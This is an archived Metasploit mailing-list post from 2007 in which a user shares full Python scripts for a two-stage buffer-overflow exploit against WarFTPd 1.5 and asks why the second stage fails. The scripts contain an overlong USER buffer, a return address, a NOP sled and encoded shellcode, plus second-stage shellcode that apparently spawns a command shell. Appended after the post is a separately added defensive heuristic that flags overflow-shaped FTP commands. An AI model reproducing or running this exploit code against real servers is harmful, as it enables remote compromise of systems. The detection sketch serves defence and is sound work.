Metasploit mailing list archives

Building multistage payloaded exploits?


From: j_fast_and_the_furious at hotmail.com (scotty to hotty)
Date: Wed, 26 Sep 2007 02:02:42 +0000


OK, HD, I've been hard at work trying to understand how the multistage payload works, but no luck... so I've decided to
post what I've got so far. Well, I'll first explain what I'm doing step by step. First I launch the first script,
which works perfectly (it has stage one of the shellcode). Next I have a second Python script which connects to the first
staged code to send the second stage of the exploit.

First stage Python script:

#!/usr/bin/python
import socket

# bad chars: "\x0d\x16\xe2"

sc = ("\x89\xe5\xdd\xc7\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x51\x57\x4d\x38\x4c\x39\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x50\x31\x49\x4b\x4c\x4b\x43\x4d\x47\x4c"
"\x4c\x4b\x43\x4c\x47\x4d\x43\x48\x45\x51\x4a\x4f\x4c\x4b\x46"
"\x37\x51\x30\x43\x31\x4b\x5a\x4c\x4b\x46\x54\x4c\x5a\x45\x51"
"\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c\x49\x51\x49\x5a\x44"
"\x4d\x45\x51\x49\x52\x4b\x34\x49\x50\x42\x55\x4a\x56\x51\x53"
"\x42\x46\x46\x59\x48\x4a\x43\x45\x4a\x43\x50\x4b\x4c\x4b\x50"
"\x4f\x47\x54\x43\x31\x4d\x39\x45\x36\x4c\x4b\x45\x4c\x50\x59"
"\x4c\x4b\x50\x4f\x45\x4c\x43\x31\x4a\x49\x43\x33\x46\x4c\x4c"
"\x59\x4c\x49\x42\x4c\x51\x34\x45\x4c\x43\x51\x4b\x4f\x4d\x30"
"\x50\x31\x49\x4b\x42\x44\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x51"
"\x50\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x45\x38"
"\x44\x48\x51\x4e\x45\x36\x46\x33\x43\x56\x42\x48\x47\x43\x46"
"\x52\x45\x38\x43\x47\x42\x53\x47\x42\x51\x4f\x50\x54\x43\x56"
"\x4e\x59\x42\x52\x45\x30\x4b\x4f\x48\x56\x4c\x55\x50\x53\x46"
"\x33\x46\x33\x46\x33\x50\x53\x51\x53\x50\x53\x51\x53\x51\x43"
"\x4b\x39\x4a\x47\x43\x56\x4b\x31\x4a\x4f\x44\x48\x45\x52\x50"
"\x57\x51\x43\x45\x36\x4e\x59\x4a\x47\x49\x4f\x4b\x4f\x4e\x36"
"\x42\x46\x4e\x59\x4e\x48\x42\x4f\x4b\x4f\x49\x46\x4c\x57\x45"
"\x36\x45\x38\x46\x50\x46\x59\x43\x56\x50\x53\x4b\x39\x4d\x31"
"\x43\x5a\x44\x50\x46\x31\x50\x57\x42\x46\x4e\x59\x4d\x50\x47"
"\x4b\x4b\x4f\x48\x56\x46\x33\x46\x37\x43\x56\x4e\x59\x42\x55"
"\x51\x59\x4b\x4f\x49\x46\x50\x54\x46\x34\x46\x34\x51\x47\x45"
"\x36\x4e\x59\x50\x32\x50\x4c\x4b\x4f\x48\x56\x4d\x47\x50\x50"
"\x42\x46\x4e\x59\x50\x33\x48\x4e\x4b\x4f\x48\x56\x4b\x39\x4b"
"\x51\x50\x50\x48\x34\x44\x4c\x46\x30\x46\x31\x46\x37\x50\x51"
"\x43\x56\x48\x39\x49\x50\x47\x48\x4b\x4f\x4b\x56\x44\x4a\x41"
"\x41")

#"\xed\x1e\x94\x7c" -> matt wholers computer

buffer = "A" * 485 + "\x4a\x75\xd4\x77" + "\x90" * 100 + sc + "\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.0.108', 21))
s.recv(1024)
s.send("USER " + buffer + '\r\n')
#s.recv(1024)
#s.send(sc + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close()

Second stage Python script:

#!/usr/bin/python
import socket
buffer = ("\x68\x33\x32\x00\x00\x68\x57\x53\x32\x5f\x57\xfc\xe8\x4c\x00"
"\x00\x00\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x7c\x05\x78\x01"
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b"
"\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2"
"\xeb\xf4\x3b\x54\x24\x24\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b"
"\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc2\x08\x00\x6a\x30\x59\x64\x8b\x31\x8b\x76\x0c\x8b\x76\x1c"
"\xad\x8b\x58\x08\x5e\x53\x68\x8e\x4e\x0e\xec\xff\xd6\x97\x53"
"\x56\x57\x8d\x44\x24\x10\x50\xff\xd7\x50\x50\x50\x68\xb6\x19"
"\x18\xe7\xff\xd6\x97\x68\xa4\x19\x70\xe9\xff\xd6\x95\x68\x08"
"\x92\xe2\xed\xff\xd6\x50\x57\x55\x83\xec\x10\x89\xe5\x89\xee"
"\x6a\x01\x6a\x00\x6a\x0c\x89\xe1\x6a\x00\x51\x56\xad\x56\x53"
"\x68\x80\x8f\x0c\x17\xff\x55\x20\x89\xc7\xff\xd0\x89\xe0\x6a"
"\x00\x50\x8d\x75\x08\x56\x8d\x75\x0c\x56\xff\xd7\x68\x43\x4d"
"\x44\x00\x89\xe2\x31\xc0\x8d\x7a\xac\x6a\x15\x59\xf3\xab\x83"
"\xec\x54\xc6\x42\xbc\x44\x66\xc7\x42\xe8\x01\x01\x8b\x75\x08"
"\x89\x72\xfc\x89\x72\xf8\x8b\x75\x04\x89\x72\xf4\x8d\x42\xbc"
"\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\x52\x51\x53\x68\x72"
"\xfe\xb3\x16\xff\x55\x20\xff\xd0\x31\xc0\xb4\x04\x96\x29\xf4"
"\x89\xe7\x6a\x64\x53\x68\xb0\x49\x2d\xdb\xff\x55\x20\xff\xd0"
"\x31\xc0\x50\x57\x50\x50\x50\xff\x75\x0c\x53\x68\x11\xc4\x07"
"\xb4\xff\x55\x20\xff\xd0\x85\xc0\x74\x74\x31\xc0\x3b\x07\x74"
"\x36\xe8\x77\x00\x00\x00\x50\x89\xe1\x50\x51\x56\x57\xff\x75"
"\x0c\x53\x68\x16\x65\xfa\x10\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x50\x31\xc0\x59\x39\xc8\x74\x11\x50\x51\x57\xff\x75\x28\xff"
"\x55\x10\x31\xc9\x39\xc8\x7c\x3a\xeb\xab\x89\xe0\xe8\x3f\x00"
"\x00\x00\x31\xc0\x50\x56\x57\xff\x75\x28\xff\x55\x14\x31\xc9"
"\x39\xc8\x7c\x86\x74\x1e\x51\x89\xe2\x51\x52\x50\x57\xff\x75"
"\x00\x53\x68\x1f\x79\x0a\xe8\xff\x55\x20\xff\xd0\x85\xc0\x74"
"\x05\x31\xc0\x59\xeb\xc8\x53\x68\xf0\x8a\x04\x5f\xff\x55\x20"
"\x31\xc9\x51\xff\xd0\x50\x54\x68\x7e\x66\x04\x80\xff\x75\x28"
"\xff\x55\x18\x85\xc0\x58\x75\xe0\xc3")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.0.108', 12345))
s.recv(1024)
s.send(buffer)
#s.recv(1024)
#s.send(sc)
s.recv(1024)
s.close()

I know that the first stage shellcode works; it's just the second stage that doesn't seem to. On the program I'm exploiting I
have OllyDbg monitoring for any flagged errors, and it only trips when I send the second stage. Anyway, can you tell me
what I'm doing wrong? Anyways, that's my exact script, and if you want to know what program I'm exploiting, it's
warftpd v1.5. So far I have all single stage exploits working but no luck on getting the multistaged ones to work.


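A defender-side check for the control-channel pattern in the scripts above, added here as an example and not code from the post or from the Metasploit project: it inspects raw FTP command lines for the traits of an overflow buffer (an overlong USER argument, a long run of one filler byte, a 0x90 NOP sled, non-printable bytes) and reports which lines trip which heuristic. The thresholds and the sample lines are constructed assumptions, not values from the post.

```python
#!/usr/bin/env python3
"""Heuristic check of FTP control-channel commands for overflow-shaped arguments."""
import re

# Assumed thresholds: a real FTP username is far shorter than the 485+ bytes
# the post's buffer needs, and it never carries a NOP sled or binary filler.
MAX_ARG_LEN = 128
NOP_SLED_MIN = 16
PAD_RUN_MIN = 64

def inspect_ftp_command(line: bytes) -> list:
    """Return a list of findings for one raw command line (CRLF optional)."""
    findings = []
    line = line.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    verb = verb.upper().decode("ascii", "replace")
    if len(arg) > MAX_ARG_LEN:
        findings.append(f"{verb}: argument length {len(arg)} exceeds {MAX_ARG_LEN}")
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if nonprint:
        findings.append(f"{verb}: {nonprint} non-printable bytes in argument")
    sled = re.search(rb"\x90{%d,}" % NOP_SLED_MIN, arg)
    if sled:
        findings.append(f"{verb}: NOP sled of {len(sled.group())} bytes")
    # A long run of one repeated byte (other than the sled itself) is the
    # filler used to reach the saved return address, not a username.
    run = re.search(rb"(.)\1{%d,}" % (PAD_RUN_MIN - 1), arg, re.DOTALL)
    if run and run.group(1) != b"\x90":
        findings.append(f"{verb}: padding run of {len(run.group())} x {run.group(1)!r}")
    return findings

def scan_capture(lines) -> dict:
    """Map line index -> findings for every command line that raised any."""
    report = {}
    for i, line in enumerate(lines):
        found = inspect_ftp_command(line)
        if found:
            report[i] = found
    return report

# Constructed sample traffic (not a real capture): a benign login, then a USER
# command shaped like the post's buffer: filler, a placeholder return address,
# a NOP sled and opaque bytes standing in for a payload.
SAMPLE_LINES = [
    b"USER anonymous\r\n",
    b"PASS guest@example.org\r\n",
    b"USER " + b"A" * 485 + b"\xde\xad\xbe\xef" + b"\x90" * 100 + b"\xcc" * 32 + b"\r\n",
]
```

Feed `scan_capture` the command lines reassembled from a port 21 stream; a benign session yields an empty report, while the shaped USER line trips all four heuristics.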

